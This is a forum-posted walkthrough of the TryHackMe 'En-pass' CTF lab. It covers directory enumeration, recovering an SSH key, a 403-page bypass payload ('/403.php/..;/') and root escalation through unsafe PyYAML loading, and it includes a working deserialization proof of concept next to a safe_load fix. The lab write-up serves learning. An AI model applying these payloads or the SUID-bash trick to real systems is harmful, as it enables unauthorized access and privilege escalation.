marcorei7 posted:

Description: Get what you can't.
Tags: security, linux
Difficulty: Medium
Host: TryHackMe | En-pass (by kiransau) - https://tryhackme.com/room/enpass

Rustscan

I started by scanning the machine with Rustscan.

rustscan -a 'machine-ip'
Because the web server was on port 8001, I started a GoBuster scan against it in the background to find hidden directories and files, adding a list of common extensions.
gobuster dir -u http://'machine-ip':8001/ -w /usr/share/dirb/wordlists/common.txt -x txt,php,sh,cgi,html,zip,bak,sql,old
Website
But first I opened port 8001 in the browser to view the main page. It showed three pictures, and at the bottom of two of them were cryptic strings.
The first string, decoded with ROT23, read "Best of Luck!!", and the second, decoded from Base64, contained the word "sadman".
The "403.php" page returned "forbidden"; I would come back to it later.
The "reg.php" page presented an input field.
Then I took a quick look at the "/zip" directory, which contained a large number of entries.
I downloaded the first one, but its extracted contents once again only held the word "sadman". A rabbit hole.
SSH key
The "/web" directory returned status code 301 (the redirect a web server typically sends when a directory is requested without its trailing slash), so I kept enumerating beneath it with GoBuster.
gobuster dir -u http://'machine-ip':8001/web/ -w /usr/share/dirb/wordlists/common.txt
This found the directory "/resources", again with status code 301.
Another scan below it with the same wordlist found nothing, so I stepped up to a bigger wordlist.
gobuster dir -u http://'machine-ip':8001/web/resources/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
This turned up the directory "/infoseek", so I ran another scan
gobuster dir -u http://'machine-ip':8001/web/resources/infoseek -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
which found the directory "/configure".
The next scan finally got me to the end of the chain.
gobuster dir -u http://'machine-ip':8001/web/resources/infoseek/configure -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
This last directory held a private SSH key. I saved it and set its permissions with
chmod 600 key
but I still had to find a username.
PHP code
Next I went to the "reg.php" page again and looked at the source code.
I am not an expert at reading PHP code, but I worked through it line by line. First, the code takes the input and uses the "explode()" function to split it into single items with a comma as the separator.
I started with the basics: the result is an array of 9 elements, indexed from 0. I knew this because the code references "val[8]", i.e. index 8, and the for-loop runs the block below it 9 times ($i < 9).
Then I looked at the string lengths the first comparison requires: the element at index 0 must have length 2 and the element at index 8 length 3.
To satisfy the next comparison, which requires some of the values to differ from each other, I simply used a different value for each element. Another interesting detail is that all the values I picked are the shifted characters from the number row of my keyboard; maybe that had something to do with it. Either way, I arrived at a possible input, all separated by commas.
§§,!,",(,),%,=,&,???
When I submitted this input, I got a password, probably the passphrase for the SSH key I found earlier. So only a username was missing.
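To check a candidate before pasting it into the form, here is an added Python model of the checks reasoned about above. It is not the room's reg.php (whose source is not reproduced here): the conditions are reconstructed from the description, which pairs of fields have to differ is my assumption (adjacent fields), and the alphabet used by the generator is my own choice. One caveat worth building in: PHP's strlen() counts bytes, so a multi-byte character such as "§" counts as two.

```python
"""Added example, not the room's reg.php: a model of the checks the post
describes. Assumed from the post: input is exploded on ',' into 9 fields
val[0]..val[8]; strlen(val[0]) == 2; strlen(val[8]) == 3; and (my guess for
"some values have to be different") each field differs from its neighbour."""

from typing import Dict, List, Tuple


def php_strlen(s: str) -> int:
    """PHP's strlen() counts bytes, not characters: "§§" is 4 bytes in UTF-8."""
    return len(s.encode("utf-8"))


def explode(sep: str, s: str) -> List[str]:
    """PHP explode(): like str.split(), empty fields are kept ('a,,b' -> 3 fields)."""
    return s.split(sep)


# Required byte lengths per index, and index pairs that must differ (assumed).
LENGTHS: Dict[int, int] = {0: 2, 8: 3}
DISTINCT_PAIRS: List[Tuple[int, int]] = [(i, i + 1) for i in range(8)]


def check(candidate: str) -> Tuple[bool, str]:
    """Return (passes, reason) for one candidate form input."""
    val = explode(",", candidate)
    if len(val) < 9:
        return False, f"need 9 fields, got {len(val)}"  # PHP would warn on val[8]
    for idx, want in LENGTHS.items():
        got = php_strlen(val[idx])
        if got != want:
            return False, f"val[{idx}] is {got} bytes, want {want}"
    for a, b in DISTINCT_PAIRS:
        if val[a] == val[b]:
            return False, f"val[{a}] == val[{b}] ({val[a]!r})"
    return True, "ok"


def build_candidate(alphabet: str = "!@#$%^&*(") -> str:
    """Construct a passing input from 9 distinct single-byte symbols: each field
    is one symbol repeated to its required length (1 where no length is fixed)."""
    symbols = list(alphabet)
    if len(set(symbols)) < 9 or any(php_strlen(c) != 1 for c in symbols):
        raise ValueError("need 9 distinct single-byte symbols")
    fields = [symbols[i] * LENGTHS.get(i, 1) for i in range(9)]
    return ",".join(fields)


if __name__ == "__main__":
    for cand in (build_candidate(), "aa,b,c,d,e,f,g,h,ii", "aa,b,b,d,e,f,g,h,iii"):
        print(f"{cand!r:32} -> {check(cand)}")
```

Run it and the reason string tells you which of the assumed conditions a candidate trips; adjust LENGTHS and DISTINCT_PAIRS to whatever the real source shows.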
403 page
Another page I wanted to inspect further was "403.php". I came across a lot of different resources about bypassing a 403 page and looked into the tools from lobuhi, iamj0ker and DirDar. From these I collected a huge list of possibilities and extended the scripts with the other payloads I had found.
As you can see, the only variant that produced a different response was
[...]/403.php/..;/
With this payload I got the username.
SSH access
Now that I had collected every part, I logged in with the username, the key file and the password.
ssh -i key imsau@'machine-ip'
Here I got the first flag (*1).
Privilege escalation
I upgraded my shell with Python3.
python3 -c 'import pty; pty.spawn("/bin/bash")'
I listed the root directory structure with
cd /
ls -la *
and found something in "/opt/scripts": the "file.py" in there was a Python script that imports yaml and, when run, loads the file "/tmp/file.yml".
Because I couldn't find a cron job for it, I uploaded "pspy" to the victim machine, and after a short while I saw the script being executed.
I had to search for quite a while, but then I got to this post by Vickie Li about hacking Python apps. With this I first wanted to insert a reverse shell, but I couldn't get it to work with a Bash or Python shell. So I tried something different and forced the script to display the root flag with the wall command, hoping that the flag was at the usual location.
I got the last flag, but the fact that I wasn't able to spawn a shell bugged me. Also, the name and location of the root flag were more of a shot in the dark. So I played around some more, tried the next shell from my list, and got a hit.
Next time I have to remember to try every reverse shell in my list. Another option would have been to set the SUID bit on the "/bin/bash" binary.
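Here is an added example of the bug class this privilege escalation relies on. It is not the room's /opt/scripts/file.py (the post does not reproduce its source); it assumes, as the post implies, that the script hands an attacker-writable YAML file to a PyYAML loader that can construct arbitrary Python objects. The payload is constructed for the demo and runs "echo pwned" so the result can be checked; in the room the same tag with os.system and the post's wall command or a reverse shell is what runs as the user executing the script. The safe loader is shown beside it.

```python
"""Added example, not the room's file.py: PyYAML deserialization of an
attacker-controlled file with an unsafe loader, next to the safe form."""

import os
import tempfile
import yaml  # PyYAML

# An unsafe loader honours !!python/object/apply and calls the named callable
# with the given arguments while parsing. UnsafeLoader exists since PyYAML 5.1;
# before that, plain yaml.Loader behaved the same way.
UNSAFE = getattr(yaml, "UnsafeLoader", yaml.Loader)

# Constructed payload: a harmless command whose output we can assert on.
PAYLOAD = """\
!!python/object/apply:subprocess.check_output
- ["echo", "pwned"]
"""


def load_like_vulnerable_script(path: str):
    """What a script doing yaml.load(open(path)) with a full loader does:
    whoever can write `path` gets code execution as the user running this."""
    with open(path) as fh:
        return yaml.load(fh, Loader=UNSAFE)


def load_safely(path: str):
    """Hardened form: safe_load only builds plain data types and rejects
    Python-specific tags, so the same file just raises an error (mapped to
    None here so both results can be compared side by side)."""
    with open(path) as fh:
        try:
            return yaml.safe_load(fh)
        except yaml.YAMLError:
            return None


def demo(payload: str = PAYLOAD):
    """Write the payload where the 'script' expects it, then load it both ways."""
    fd, path = tempfile.mkstemp(suffix=".yml")  # stands in for /tmp/file.yml
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(payload)
        return load_like_vulnerable_script(path), load_safely(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    unsafe, safe = demo()
    print("unsafe loader returned:", unsafe)  # b'pwned\n': the command really ran
    print("safe_load returned:    ", safe)    # None: the tag was rejected
```

Two things follow for the defender's side: a script run with privileges must not parse a file that lower-privileged users can write (a world-writable /tmp path is exactly that), and yaml.safe_load should be the default unless object construction is genuinely needed.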